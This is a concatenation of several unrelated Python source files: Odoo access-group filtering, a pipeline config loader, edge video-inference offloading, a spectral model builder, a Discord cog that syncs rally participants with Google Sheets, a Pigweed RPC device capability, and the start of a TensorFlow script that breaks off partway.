        result = super(BaseModelAccessGroups, self)._after_read(result)
        if self.env.user.id == SUPERUSER_ID or self._eval_access_skip("read"):
            return result
        access_ids = self._get_complete_access_ids("read")
        result = [result] if not isinstance(result, list) else result
        if len(access_ids) > 0:
            access_result = []
            for record in result:
                if record['id'] in access_ids:
                    access_result.append(record)
            return access_result
        return []

    @api.model
    def _after_search(self, result, *largs, **kwargs):
        """Filter search results (integer id or recordset) by read access."""
        result = super(BaseModelAccessGroups, self)._after_search(result)
        if self.env.user.id == SUPERUSER_ID or self._eval_access_skip("read"):
            return result
        access_ids = self._get_complete_access_ids("read")
        if len(access_ids) > 0:
            access_result = self.env[self._name]
            if isinstance(result, int):
                # A bare integer id is returned unchanged when accessible.
                if result in access_ids:
                    return result
            else:
                for record in result:
                    if record.id in access_ids:
                        access_result += record
            return access_result
        return self.env[self._name]

    @api.model
    def _after_name_search(self, result, *largs, **kwargs):
        """Filter name_search (id, display_name) tuples by read access."""
        result = super(BaseModelAccessGroups, self)._after_name_search(result)
        if self.env.user.id == SUPERUSER_ID or self._eval_access_skip("read"):
            return result
        access_ids = self._get_complete_access_ids("read")
        if len(access_ids) > 0:
            access_result = []
            # NOTE: the loop variable shadows the builtin `tuple`; kept as-is.
            for tuple in result:
                if tuple[0] in access_ids:
                    access_result.append(tuple)
            return access_result
        return []

    #----------------------------------------------------------
    # Read, View
    #----------------------------------------------------------

    @api.multi
    def _compute_groups(self, write=True):
        """Compute the complete group set of each record.

        With write=False a values dict for a single record is returned
        instead of being written to the database.
        """
        if write:
            for record in self:
                record.complete_groups = record.get_groups()
        else:
            self.ensure_one()
            return {'complete_groups': [(6, 0, self.get_groups().mapped('id'))]}

    #----------------------------------------------------------
    # Create, Update, Delete
    #----------------------------------------------------------

    @api.multi
    def _before_write(self, vals, *largs, **kwargs):
        # Enforce group permissions before the actual write.
        self.check_access_groups('write')
        return super(BaseModelAccessGroups, self)._before_write(vals, *largs, **kwargs)

    @api.multi
    def _before_unlink(self, *largs, **kwargs):
        # Enforce group permissions before the actual unlink.
        self.check_access_groups('unlink')
        return super(BaseModelAccessGroups, self)._before_unlink(*largs, **kwargs)

    @api.multi
    def _check_recomputation(self, vals, olds, *largs, **kwargs):
        """Recompute complete_groups when group assignments changed."""
        super(BaseModelAccessGroups, self)._check_recomputation(vals, olds, *largs, **kwargs)
        fields = []
        if self.check_group_values(vals):
            fields.extend(['complete_groups'])
        if fields:
            self.trigger_computation(fields)
|
<gh_stars>0
import json
import os
from agent import source
from agent.modules.logger import get_logger
from agent.modules.constants import ROOT_DIR
from agent.pipeline import Pipeline
logger = get_logger(__name__)
class BaseConfigLoader:
    """Loads the JSON base pipeline config matching a pipeline's source type."""

    # Directory (under pipeline/config/) holding the base config templates.
    BASE_PIPELINE_CONFIGS_PATH = 'base_pipelines'

    @classmethod
    def load_base_config(cls, pipeline: Pipeline) -> dict:
        """Read the template file and return its 'pipelineConfig' section."""
        with open(cls._get_config_path(pipeline)) as f:
            data = json.load(f)
        return data['pipelineConfig']

    @classmethod
    def _get_config_path(cls, pipeline: Pipeline):
        # Absolute path of the template file for this pipeline's source type.
        return os.path.join(ROOT_DIR, 'pipeline', 'config', cls.BASE_PIPELINE_CONFIGS_PATH,
                            cls._get_config_file(pipeline))

    @classmethod
    def _get_config_file(cls, pipeline: Pipeline) -> str:
        # Map source type -> template base name; raises KeyError for an
        # unsupported source type.
        name = {
            source.TYPE_CACTI: 'cacti',
            source.TYPE_CLICKHOUSE: 'jdbc_http',
            source.TYPE_ELASTIC: 'elastic_http',
            source.TYPE_INFLUX: 'influx_http',
            source.TYPE_KAFKA: 'kafka_http',
            source.TYPE_MONGO: 'mongo_http',
            source.TYPE_MYSQL: 'jdbc_http',
            source.TYPE_POSTGRES: 'jdbc_http',
            source.TYPE_SAGE: 'sage_http',
            source.TYPE_SPLUNK: 'tcp_server_http',
            source.TYPE_SOLARWINDS: 'solarwinds',
            source.TYPE_VICTORIA: 'victoria_http',
            source.TYPE_ZABBIX: 'zabbix_http',
        }[pipeline.source.type]
        return name + '.json'
class SchemaBaseConfigLoader(BaseConfigLoader):
    """Loads base configs for schema-based pipelines ('*_schema.json' files)."""

    @classmethod
    def _get_config_file(cls, pipeline: Pipeline) -> str:
        # Source type -> template base name; unsupported types raise KeyError.
        config_names = {
            source.TYPE_CLICKHOUSE: 'jdbc_http',
            source.TYPE_DIRECTORY: 'directory_http',
            source.TYPE_INFLUX: 'influx',
            source.TYPE_KAFKA: 'kafka_http',
            source.TYPE_MYSQL: 'jdbc_http',
            source.TYPE_POSTGRES: 'jdbc_http',
        }
        base_name = config_names[pipeline.source.type]
        return base_name + '_schema.json'
class TestPipelineBaseConfigLoader(BaseConfigLoader):
    """Loads configs for throwaway 'test' pipelines used to validate sources."""

    # Test templates live in their own directory.
    BASE_PIPELINE_CONFIGS_PATH = 'test_pipelines'

    @classmethod
    def _get_config_file(cls, pipeline: Pipeline) -> str:
        # The random-looking suffixes keep test pipeline names unique;
        # unsupported source types raise KeyError.
        return {
            source.TYPE_CLICKHOUSE: 'test_jdbc_pdsf4587',
            source.TYPE_DIRECTORY: 'test_directory_ksdjfjk21',
            source.TYPE_ELASTIC: 'test_elastic_asdfs3245',
            source.TYPE_INFLUX: 'test_influx_qwe093',
            source.TYPE_MONGO: 'test_mongo_rand847',
            source.TYPE_KAFKA: 'test_kafka_kjeu4334',
            source.TYPE_MYSQL: 'test_jdbc_pdsf4587',
            source.TYPE_POSTGRES: 'test_jdbc_pdsf4587',
            source.TYPE_SAGE: 'test_sage_jfhdkj',
            source.TYPE_SPLUNK: 'test_tcp_server_jksrj322',
            source.TYPE_SOLARWINDS: 'test_solarwinds_jksrj322',
            source.TYPE_ZABBIX: 'test_zabbix_jfhdkj',
        }[pipeline.source.type] + '.json'
class BaseConfigHandler:
    """Turns a base pipeline config template into a concrete pipeline config.

    Subclasses override ``stages_to_override`` with a mapping of stage
    ``instanceName`` -> stage-config factory; matching stages in the base
    config get their configuration values replaced.
    """

    # Mapping: stage instanceName -> callable(pipeline, stage) exposing .config
    stages_to_override = {}

    def __init__(self, pipeline: Pipeline, base_config: dict):
        self.config = base_config
        self.pipeline = pipeline

    def override_base_config(self):
        """Apply all pipeline-specific overrides and return the final config."""
        self._override_pipeline_config()
        self._override_stages()
        self._set_labels()
        return self.config

    def _set_labels(self):
        # Tag the pipeline with its source and destination types.
        self.config['metadata']['labels'] = [self.pipeline.source.type, self.pipeline.destination.TYPE]

    def _override_stages(self):
        # For every stage we know how to override, replace matching
        # configuration values in place.
        for stage in self.config['stages']:
            if stage['instanceName'] in self.stages_to_override:
                stage_config = self.stages_to_override[stage['instanceName']](self.pipeline, stage).config
                for conf in stage['configuration']:
                    if conf['name'] in stage_config:
                        conf['value'] = stage_config[conf['name']]

    def _get_pipeline_config(self) -> dict:
        """Constants injected into the pipeline's 'constants' configuration."""
        return {
            'TOKEN': self.pipeline.destination.token,
            'PROTOCOL': self.pipeline.destination.PROTOCOL_20,
            'ANODOT_BASE_URL': self.pipeline.destination.url,
            'AGENT_URL': self.pipeline.streamsets.agent_external_url,
        }

    def _override_pipeline_config(self):
        # Set the pipeline title and rewrite the 'constants' entry with the
        # key/value pairs from _get_pipeline_config().
        self.config['title'] = self.pipeline.name
        for config in self.config['configuration']:
            if config['name'] == 'constants':
                config['value'] = [{'key': key, 'value': val} for key, val in self._get_pipeline_config().items()]
|
<gh_stars>10-100
import queue
import sys
import time
import string
import random
import numpy as np
from loguru import logger
from concurrent import futures
import edge_globals
from tools.read_config import read_config
from local.preprocessor import preprocess
from frontend_server.offloading import send_frame
from tools.transfer_files_tool import transfer_array_and_str
from model_manager import object_detection, image_classification
# the video frame handler of the forwarding server
# (URL read once at import time from the "flask-url" config section)
frame_handler = read_config("flask-url", "video_frame_url")
# generate the id for a task
def id_gen(size=6, chars=string.ascii_uppercase + string.digits):
    """Return a random task id of ``size`` characters drawn from ``chars``."""
    picks = (random.choice(chars) for _ in range(size))
    return ''.join(picks)
class ThreadPoolExecutorWithQueueSizeLimit(futures.ThreadPoolExecutor):
    """ThreadPoolExecutor whose pending-work queue is bounded.

    Submitting more than ``maxsize`` pending items blocks the caller
    instead of letting the (normally unbounded) work queue grow.
    """
    def __init__(self, maxsize=50, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Swap the parent's unbounded queue for a bounded one.
        self._work_queue = queue.Queue(maxsize=maxsize)
class Task:
    """One inference job for a single video frame."""
    def __init__(self, task_id, frame, serv_type, t_start):
        self.task_id = task_id      # task identifier
        self.frame = frame          # the video frame payload
        self.serv_type = serv_type  # service type (e.g. OBJECT_DETECTION)
        self.t_start = t_start      # creation timestamp, used for delay stats
        # The fields below start empty and are set elsewhere before use;
        # selected_model is read by local_inference/offload_worker.
        self.selected_model = None
        self.location = None
        self.new_size = None
        self.new_qp = None
def local_inference(task):
    """local inference for a video frame"""
    model = edge_globals.loaded_model[task.selected_model]
    if task.serv_type == edge_globals.OBJECT_DETECTION:
        return object_detection.object_detection_api(task.frame, model, threshold=0.8)
    if task.serv_type == edge_globals.IMAGE_CLASSIFICATION:
        return image_classification.image_classification(task.frame, model)
    # Unknown service type: fall through and return None, as before.
def local_worker(task_queue):
    """Worker loop: pull tasks off ``task_queue`` and run local inference.

    Runs forever; if getting from the queue raises, the average local
    delay is computed and the worker exits via sys.exit().
    """
    while True:
        # get a task from the queue
        try:
            task = task_queue.get(block=True)
            edge_globals.sys_info.local_pending_task -= 1
        except Exception:
            # Queue failure/shutdown: summarize delays and stop the worker.
            average_local_delay = np.average([p.value for p in edge_globals.sys_info.local_delay])
            # logger.info("average local delay:"+str(average_local_delay))
            sys.exit()
        else:
            # locally process the task
            t_start = task.t_start
            result = local_inference(task)
            t_end = time.time()
            processing_delay = t_end - t_start
            # logger.info("local_processing_delay:"+str(processing_delay))
            # record the processing delay
            edge_globals.sys_info.append_local_delay(t_start, processing_delay)
            if task.serv_type == edge_globals.IMAGE_CLASSIFICATION:
                logger.info("image classification result:"+result)
            elif task.serv_type == edge_globals.OBJECT_DETECTION:
                # Detection results are stored as an image on disk.
                logger.info("object detection works well! please go to info_store/handled_result to check.")
                edge_globals.datastore.store_image(result)
def offload_worker(task):
    """Offload one task to the remote frontend server and record stats.

    Preprocesses the frame, sends it via ``send_frame``, then records
    bandwidth and end-to-end delay and stores/logs the result.
    """
    task = preprocess(task)
    file_size = sys.getsizeof(task.frame)
    # send the video frame to the server
    try:
        result_dict, start_time, processing_delay, arrive_transfer_server_time = \
            send_frame(frame_handler, task.frame, task.selected_model)
        t_end = time.time()
    except Exception as err:
        logger.exception("offloading error")
    else:
        total_processing_delay = t_end - task.t_start
        # record the bandwidth and the processing delay
        bandwidth = file_size / arrive_transfer_server_time
        edge_globals.sys_info.append_bandwidth(task.t_start, bandwidth)
        edge_globals.sys_info.append_offload_delay(task.t_start, total_processing_delay)
        if task.serv_type == edge_globals.IMAGE_CLASSIFICATION:
            result = result_dict["prediction"]
            logger.info("offload:"+result)
        elif task.serv_type == edge_globals.OBJECT_DETECTION:
            # Parse the "(h, w, c)"-style string back into a shape tuple,
            # then rebuild the annotated frame from the transferred string.
            frame_shape = tuple(int(s) for s in result_dict["frame_shape"][1:-1].split(","))
            frame_handled = transfer_array_and_str(result_dict["result"], 'down').reshape(frame_shape)
            edge_globals.datastore.store_image(frame_handled)
            logger.info("cloud process image well!")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Create models for *sick* """
from __future__ import division, print_function
__all__ = ("create", )
__author__ = "<NAME> <<EMAIL>>"
import cPickle as pickle
import logging
import os
import yaml
from time import strftime
import numpy as np
from astropy.io import fits
from astropy.table import Table
from sick import __version__ as sick_version
logger = logging.getLogger("sick")
def load_simple_data(filename, **kwargs):
    """Load a data array from a FITS or plain-text file.

    :param filename: path to a ``.fit(s)[.gz]`` FITS file or a
        whitespace-delimited text file
    :param extension: (FITS only, via kwargs) index of the extension to
        read; defaults to the first extension that contains data
    :param kwargs: remaining keywords are passed through to ``np.loadtxt``
        for text files
    :raises IOError: if a FITS file contains no extension with data
    """
    logger.debug("Opening {}".format(filename))
    fits_extensions = (".fit", ".fits", ".fit.gz", ".fits.gz")
    # Idiom fix: str.endswith accepts a tuple of suffixes directly,
    # replacing the original any(map(lambda ...)) construction.
    if filename.endswith(fits_extensions):
        # Load as FITS.
        with fits.open(filename) as image:
            extension_index = kwargs.pop("extension", None)
            if extension_index is None:
                # Get first extension with data.
                for extension_index, extension in enumerate(image):
                    if extension.data is not None: break
                else:
                    raise IOError("no valid data in {}".format(filename))
            data = image[extension_index].data
        return data
    else:
        return np.loadtxt(filename, **kwargs)
def create(output_prefix, grid_flux_filename, wavelength_filenames,
    clobber=False, grid_flux_filename_format="csv", **kwargs):
    """
    Create a new *sick* model from files describing the parameter names, fluxes,
    and wavelengths.

    Writes four outputs sharing ``output_prefix``: a ``.yaml`` model file,
    a ``.pkl`` file with the grid points and metadata, and two ``.memmap``
    files holding wavelengths and intensities.

    NOTE(review): this module targets Python 2 (``cPickle`` import; the
    ``map(...)`` below is used as a list) — porting to Python 3 requires
    materializing those ``map`` calls explicitly.
    """
    if not clobber:
        # Check to make sure the output files won't exist already.
        output_suffixes = (".yaml", ".pkl", "-wavelengths.memmap",
            "-intensities.memmap")
        for path in [output_prefix + suffix for suffix in output_suffixes]:
            if os.path.exists(path):
                raise IOError("output filename {} already exists".format(path))
    # Read the grid_flux filename.
    # param1 param2 param3 param4 channelname1 channelname2
    kwds = kwargs.pop("__grid_flux_filename_kwargs", {})
    kwds.update({"format": grid_flux_filename_format})
    grid_flux_tbl = Table.read(grid_flux_filename, **kwds)
    # Distinguish column names between parameters (real numbers) and filenames
    str_columns = \
        np.array([_[1].startswith("|S") for _ in grid_flux_tbl.dtype.descr])
    # Check the number of channels provided.
    if str_columns.sum() != len(wavelength_filenames):
        raise ValueError("expected {0} wavelength filenames because {1} has {0}"
            " string columns ({2}) but found {3} wavelength filenames".format(
                sum(str_columns), grid_flux_filename,
                ", ".join(np.array(grid_flux_tbl.colnames)[str_columns]),
                len(wavelength_filenames)))
    # Create a record array of the grid points.
    grid_points = \
        grid_flux_tbl.as_array()[np.array(grid_flux_tbl.colnames)[~str_columns]]
    # To-do: make sure they are all floats.
    # Sort the grid points.
    grid_indices = grid_points.argsort(order=grid_points.dtype.names)
    grid_points = grid_points[grid_indices]
    grid_flux_tbl = grid_flux_tbl[grid_indices]
    # Check the wavelength filenames.
    # (map() returns a list under Python 2 — see module note above.)
    channel_wavelengths = np.array(map(load_simple_data, wavelength_filenames))
    # Sort the channels by starting wavelength.
    c_indices = np.argsort([each.min() for each in channel_wavelengths])
    channel_names = np.array(grid_flux_tbl.colnames)[str_columns][c_indices]
    channel_wavelengths = channel_wavelengths[c_indices]
    channel_sizes = [len(_) for _ in channel_wavelengths]
    num_pixels = sum(channel_sizes)
    # Create the model YAML file.
    with open(output_prefix + ".yaml", "w") as fp:
        header = "\n".join([
            "# Model created on {0}".format(strftime("%Y-%m-%d %H:%M:%S")),
            "# Grid parameters: {0}".format(", ".join(grid_points.dtype.names)),
            "# Channel names: {0}".format(", ".join(channel_names))
        ])
        fp.write(header + "\n" + yaml.safe_dump({ "model_grid": {
                "grid_points": output_prefix + ".pkl",
                "intensities": output_prefix + "-intensities.memmap",
                "wavelengths": output_prefix + "-wavelengths.memmap"
            }}, stream=None, allow_unicode=True, default_flow_style=False))
    # Create the pickled model file, with meta data.
    metadata = {
        "grid_flux_filename": grid_flux_filename,
        "wavelength_filenames": wavelength_filenames,
        "channel_names": channel_names,
        "channel_sizes": channel_sizes,
        "channel_resolutions": [float("inf")] * len(channel_names),
        "sick_version": sick_version
    }
    logger.debug("Dumping grid points and metadata to file")
    with open(output_prefix + ".pkl", "wb") as fp:
        # Protocol -1 == highest available pickle protocol.
        pickle.dump((grid_points, metadata), fp, -1)
    # Create the memory-mapped dispersion file.
    logger.debug("Creating memory-mapped dispersion file.")
    wavelengths_memmap = np.memmap(output_prefix + "-wavelengths.memmap",
        dtype="float32", mode="w+", shape=(num_pixels, ))
    wavelengths_memmap[:] = np.hstack(channel_wavelengths)
    wavelengths_memmap.flush()
    del wavelengths_memmap
    # Create the memory-mapped intensities file.
    logger.debug("Creating memory-mapped intensities file.")
    intensities_memmap = np.memmap(output_prefix + "-intensities.memmap",
        shape=(grid_points.size, num_pixels), dtype="float32",
        mode="w+")
    n = len(grid_flux_tbl)
    for i, row in enumerate(grid_flux_tbl):
        logger.debug("Loading point {0}/{1} into the intensities map"\
            .format(i + 1, n))
        j = 0
        # Concatenate each channel's flux into one row of the memmap.
        for channel_name in channel_names:
            try:
                data = load_simple_data(row[channel_name])
            except:
                logger.exception("Could not load data from {0} for channel {1}"\
                    .format(row[channel_name], channel_name))
                raise
            intensities_memmap[i, j:j + data.size] = data
            j += data.size
    intensities_memmap.flush()
    del intensities_memmap
    return True
|
<filename>cogs/daymar.py
import discord # noqa
import sheets
import utility
import event
from constants import Constants
from discord.ext import commands
class Daymar(commands.Cog):
    """Discord cog managing Daymar Rally participants via Google Sheets.

    Participant data (RSI handle, role, server number, Discord id) lives
    in a spreadsheet accessed through the ``sheets`` module; the commands
    below keep that sheet in sync with guild member state on the client.
    """

    def __init__(self, client):
        # The bot client; also carries guildMembers and orgEvents state.
        self.client = client

    def addParticipant(self, member, memberType='Security'):
        """Write (or update) a participant row in the Daymar sheet.

        :param member: guild member object (uses .id, .name, .rsiHandle)
        :param memberType: role column value, defaults to 'Security'
        """
        # Zero-based column offsets within a sheet row.
        rsiCol = 0
        serverCol = 2
        idCol = 4
        sheetData = sheets.getAllValues(daymar=True)
        # Get the rsi names column.
        rsiNames = [row[rsiCol] for row in sheetData]
        serverNums = [row[serverCol] for row in sheetData]
        memberIds = [row[idCol] for row in sheetData]
        # Get available row index
        try:
            rowIndex = rsiNames.index('')
        except ValueError:
            rowIndex = len(rsiNames)
        # Check if user already exists in sheet.
        for index, id in enumerate(memberIds):
            try:
                pId = int(id)
                if member.id == pId:
                    rowIndex = index
                    server = int(serverNums[index])
                    break
            except ValueError:
                server = ''
        # NOTE(review): if every stored id parses as an int and none matches
        # the member, 'server' is never assigned and the writes below raise
        # NameError — confirm whether that path can occur in practice.
        startIndex = (rowIndex, 0)
        endIndex = (rowIndex, 4)
        # Write values to sheet.
        if member.rsiHandle is not None:
            data = [member.rsiHandle, memberType, server, '', str(member.id)]
            sheets.setRange(startIndex, endIndex, [data], daymar=True)
        else:
            # No verified RSI handle: fall back to Discord name and flag it.
            data = [
                member.name,
                memberType,
                server,
                'RSI handle not verified',
                str(member.id)
            ]
            sheets.setRange(startIndex, endIndex, [data], daymar=True)

    def clearParticipant(self, member):
        """Delete the member's row from the Daymar sheet, if present."""
        # NOTE(review): idCol is 5 here but 4 in addParticipant — presumably
        # getCol() is 1-based while row lists are 0-indexed; confirm.
        idCol = 5
        rowIndex = None
        # Check if user already exists in sheet.
        memberIds = sheets.getCol(idCol, daymar=True)
        for index, id in enumerate(memberIds):
            try:
                pId = int(id)
                if member.id == pId:
                    rowIndex = index
                    break
            except ValueError:
                pass
        if rowIndex is not None:
            # Sheet rows are 1-based, hence the +1.
            sheets.deleteRows(rowIndex + 1, daymar=True)

    def clearDaymarSheet(self):
        """Remove all participant rows (row 2 onward) from the Daymar sheet."""
        data = sheets.getAll(daymar=True)
        sheets.deleteRows(2, rowNum=len(data), daymar=True)

    def checkId(ctx):
        # Command-check predicate (no 'self' — discord.py calls it with ctx
        # only, see @commands.check(checkId) on get_csv below). True iff
        # the invoking user has elevated Daymar access.
        id = int(ctx.author.id)
        if id in Constants.DAYMAR_ELEVATED_ACCESS_IDS:
            return True
        else:
            return False

    def can_add_participants(ctx):
        # Command-check predicate placeholder.
        return True  # TODO: Make this function.

    def correct_password(ctx):
        # Command-check predicate placeholder.
        return True  # TODO: Make this function.

    @commands.command()
    async def set_rsi_handle(self, ctx, *, rsiHandle=''):
        """Sets the RSI handle of the user invoking the command.

        :param rsiHandle: RSI handle
        :type rsiHandle: str

        example:
            !eb.set_rsi_handle myRSIhandle
        """
        # Validate: non-empty, at least 3 characters, no spaces.
        if rsiHandle == '':
            await ctx.send(
                'Please specify your RSI handle by typing:\n'
                f'{Constants.CMD_PREFIX}set_rsi_handle <your rsi handle> '
                'without the <>'
            )
            return
        if len(rsiHandle) < 3:
            await ctx.send(
                'RSI handles must be at least 3 characters long. Please enter '
                'a valid RSI handle.'
            )
            return
        if ' ' in rsiHandle:
            await ctx.send(
                'RSI handles cannot contain spaces. Please enter a valid '
                'RSI handle.'
            )
            return
        # Search for user in guild members
        guildMembers = self.client.guildMembers.members
        for m in guildMembers:
            if m.id == ctx.author.id:
                m.rsiHandle = rsiHandle
                break
        else:
            # Not tracked yet: create and register a new guild member record.
            m = event.GuildMember(
                id=ctx.author.id,
                name=ctx.author.name,
                rsiHandle=rsiHandle
            )
            guildMembers.append(m)
        # Persist the updated member list to disk.
        guildMemberData = self.client.guildMembers.json(indent=2)
        utility.saveData(Constants.GUILD_MEMBER_DATA_FILENAME, guildMemberData)
        # Add to sheet if in daymar event, and participant is active.
        orgEvents = self.client.orgEvents.events
        for e in orgEvents:
            if e.eventType == event.EventType.daymar:
                p = e.getParticipant(ctx.author.id)
                if p:
                    if p.active is True:
                        self.addParticipant(m)
                break
        await ctx.send(
            f'Your RSI handle has been set to: **{rsiHandle}**\n'
            'You may change your registered RSI handle name at any time by '
            'running this command again.'
        )

    # @commands.command()
    # @commands.check(can_add_participants)

    @commands.command()
    @commands.check(checkId)
    async def get_csv(self, ctx):
        """DM the invoker a CSV export of the Daymar overview sheet.

        Falls back to the last saved csv file when the live sheet has no
        data beyond the header row.
        """
        fileName = 'DaymarSecurity.csv'
        # TODO: Refactor this mess.
        data = sheets.getAll(daymarOverview=True)
        if len(data) < 2:
            # Sheet effectively empty: try sending the last saved export.
            try:
                with open(fileName, 'rb') as fp:
                    attachment = discord.File(fp=fp)
                    await ctx.author.send(
                        'Could not find data from active Daymar Rally. Attaching '
                        'last saved csv file.',
                        file=attachment
                    )
            except FileNotFoundError:
                await ctx.author.send('No Daymar Rally data found.')
        else:
            sheets.exportCsv(fileName)
            with open(fileName, 'rb') as fp:
                attachment = discord.File(fp=fp)
                await ctx.author.send(
                    'Attaching latest Daymar Rally data.',
                    file=attachment
                )
def setup(client):
    # discord.py extension entry point: register the Daymar cog on the bot.
    client.add_cog(Daymar(client))
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Default implementation of the Pigweed RPC device common capability."""
import time
from typing import Any, Callable, Optional
from gazoo_device import decorators
from gazoo_device import errors
from gazoo_device import gdm_logger
from gazoo_device.capabilities.interfaces import pwrpc_common_base
from gazoo_device.switchboard.transports import pigweed_rpc_transport
try:
# pylint: disable=g-import-not-at-top
# pytype: disable=import-error
from device_service import device_service_pb2
# pytype: enable=import-error
except ImportError:
device_service_pb2 = None
logger = gdm_logger.get_logger()
_RPC_TIMEOUT = 10
class PwRPCCommonDefault(pwrpc_common_base.PwRPCCommonBase):
  """Pigweed RPC common capability for devices communicating over PwRPC."""

  def __init__(self,
               device_name: str,
               switchboard_call: Callable[..., Any],
               switchboard_call_expect: Callable[..., Any]):
    """Create an instance of the PwRPCCommonDefault capability.

    Args:
      device_name: Device name used for logging.
      switchboard_call: The switchboard.call method which calls to the endpoint.
        See more examples in nrf_pigweed_lighting.py.
      switchboard_call_expect: The switchboard.call_and_expect method.
    """
    super().__init__(device_name=device_name)
    self._switchboard_call = switchboard_call
    self._switchboard_call_expect = switchboard_call_expect

  @decorators.DynamicProperty
  def vendor_id(self) -> str:
    """The vendor id of the device."""
    return self._get_static_info("vendor_id")

  @decorators.DynamicProperty
  def product_id(self) -> str:
    """The product id of the device."""
    return self._get_static_info("product_id")

  @decorators.DynamicProperty
  def software_version(self) -> str:
    """The software version of the device."""
    return self._get_static_info("software_version")

  @decorators.CapabilityLogDecorator(logger)
  def reboot(self,
             no_wait: bool = False,
             rpc_timeout_s: int = _RPC_TIMEOUT,
             bootup_logline_regex: Optional[str] = None,
             bootup_timeout: Optional[int] = None):
    """Reboots the device.

    Args:
      no_wait: Return before reboot completes.
      rpc_timeout_s: Timeout (s) for RPC call.
      bootup_logline_regex: Device logline indicating booting up, not applicable
        if no_wait is True.
      bootup_timeout: Timeout (s) to wait for the bootup message, not applicable
        if no_wait is True.
    """
    # NOTE(review): with no_wait=False, both bootup_logline_regex and
    # bootup_timeout must be provided — _trigger_device_action raises
    # ValueError when only one is given, and _wait_for_bootup_complete
    # cannot handle a None timeout. Confirm callers always pass both.
    if no_wait:
      self._trigger_device_action(action="Reboot",
                                  rpc_timeout_s=rpc_timeout_s)
    else:
      # Fire the RPC and wait for the bootup logline, then poll until
      # the device answers RPCs again.
      self._trigger_device_action(action="Reboot",
                                  rpc_timeout_s=rpc_timeout_s,
                                  expect_regex=bootup_logline_regex,
                                  expect_timeout_s=bootup_timeout)
      self._wait_for_bootup_complete(bootup_timeout)

  @decorators.CapabilityLogDecorator(logger)
  def factory_reset(self,
                    no_wait: bool = False,
                    rpc_timeout_s: int = _RPC_TIMEOUT,
                    bootup_logline_regex: Optional[str] = None,
                    bootup_timeout: Optional[int] = None):
    """Factory resets the device.

    Args:
      no_wait: Return before factory-reset completes.
      rpc_timeout_s: Timeout (s) for RPC call.
      bootup_logline_regex: Device logline indicating booting up, not applicable
        if no_wait is True.
      bootup_timeout: Timeout (s) to wait for the bootup message, not applicable
        if no_wait is True.
    """
    # Same wait semantics as reboot() above.
    if no_wait:
      self._trigger_device_action(action="FactoryReset",
                                  rpc_timeout_s=rpc_timeout_s)
    else:
      self._trigger_device_action(action="FactoryReset",
                                  rpc_timeout_s=rpc_timeout_s,
                                  expect_regex=bootup_logline_regex,
                                  expect_timeout_s=bootup_timeout)
      self._wait_for_bootup_complete(bootup_timeout)

  @decorators.CapabilityLogDecorator(logger)
  def ota(self):
    """Triggers OTA to the device."""
    self._trigger_device_action("TriggerOta")

  def _get_static_info(self, property_name: str) -> str:
    """Returns device static information.

    Args:
      property_name: Static property name which currently supports: vendor_id,
        product_id and software_version.

    Returns:
      The requested property value from the device's DeviceInfo payload.

    Raises:
      DeviceError: The ack status is not true or an invalid property_name is
        given.
    """
    # Single GetDeviceInfo RPC returns all static properties at once.
    ack, payload_in_bytes = self._switchboard_call(
        method=pigweed_rpc_transport.PigweedRPCTransport.rpc,
        method_args=("Device", "GetDeviceInfo"),
        method_kwargs={})
    if not ack:
      raise errors.DeviceError("{} getting static info failed.".format(
          self._device_name))
    payload = device_service_pb2.DeviceInfo.FromString(payload_in_bytes)
    device_property = getattr(payload, property_name, None)
    if device_property is None:
      raise errors.DeviceError(f"{property_name} doesn't exist in static info.")
    return device_property

  def _trigger_device_action(
      self,
      action: str,
      rpc_timeout_s: int = _RPC_TIMEOUT,
      expect_regex: Optional[str] = None,
      expect_timeout_s: Optional[int] = None) -> None:
    """Triggers specific device action.

    Args:
      action: Device actions including reboot, factory-reset and OTA.
      rpc_timeout_s: Timeout (s) for RPC call.
      expect_regex: Expected device logline regex.
      expect_timeout_s: Timeout (s) to wait for the expected regex.

    Raises:
      DeviceError: The ack status is not true.
    """
    # Plain RPC when no logline is expected; call_and_expect otherwise.
    if expect_regex is None and expect_timeout_s is None:
      ack, _ = self._switchboard_call(
          method=pigweed_rpc_transport.PigweedRPCTransport.rpc,
          method_args=("Device", action),
          method_kwargs={"pw_rpc_timeout_s": rpc_timeout_s})
    elif expect_regex is not None and expect_timeout_s is not None:
      _, (ack, _) = self._switchboard_call_expect(
          method=pigweed_rpc_transport.PigweedRPCTransport.rpc,
          pattern_list=[expect_regex],
          timeout=expect_timeout_s,
          method_args=("Device", action),
          method_kwargs={"pw_rpc_timeout_s": rpc_timeout_s},
          raise_for_timeout=True)
    else:
      raise ValueError("Only one of \"expect_regex\", \"expect_timeout_s\" "
                       "arguments was provided. Both or neither should be "
                       "provided.")
    if not ack:
      raise errors.DeviceError("{} triggering {} failed: The action did not"
                               " succeed".format(self._device_name, action))

  def _wait_for_bootup_complete(self, bootup_timeout: int):
    """Waits for device to boot up.

    Args:
      bootup_timeout: Max time to wait for bootup to complete (in seconds).

    Raises:
      DeviceError: If device did not boot up successfully in given timeout.
    """
    start_time = time.time()
    bootup_time = start_time + bootup_timeout
    while time.time() < bootup_time:
      try:
        # Reading software_version issues an RPC (_get_static_info); a
        # successful read means the device is responsive again.
        logger.debug("{} responded to the RPC call: {}".
                     format(self._device_name, self.software_version))
        logger.info("{} booted up in {}s".
                    format(self._device_name, time.time() - start_time))
        return
      except errors.DeviceError:
        logger.debug("{} hasn't booted up yet.".format(self._device_name))
      time.sleep(0.5)
    raise errors.DeviceError(f"Failed to boot up within {bootup_timeout}s.")
|
import tensorflow as tf
from sklearn.metrics import confusion_matrix
import numpy as np
import load
# Pull the dataset arrays prepared by the load module.
train_samples, train_labels = load._train_samples, load._train_labels
test_samples, test_labels = load._test_samples, load._test_labels
print('Training set', train_samples.shape, train_labels.shape)
print(' Test set', test_samples.shape, test_labels.shape)

# Dataset geometry shared by the graph definition below.
image_size = load.image_size
num_labels = load.num_labels
num_channels = load.num_channels
def get_chunk(samples, labels, chunkSize):
    """
    Iterator/Generator: yields (batch_index, sample_batch, label_batch).

    Usable in a for loop, just like the range() function. Note that only
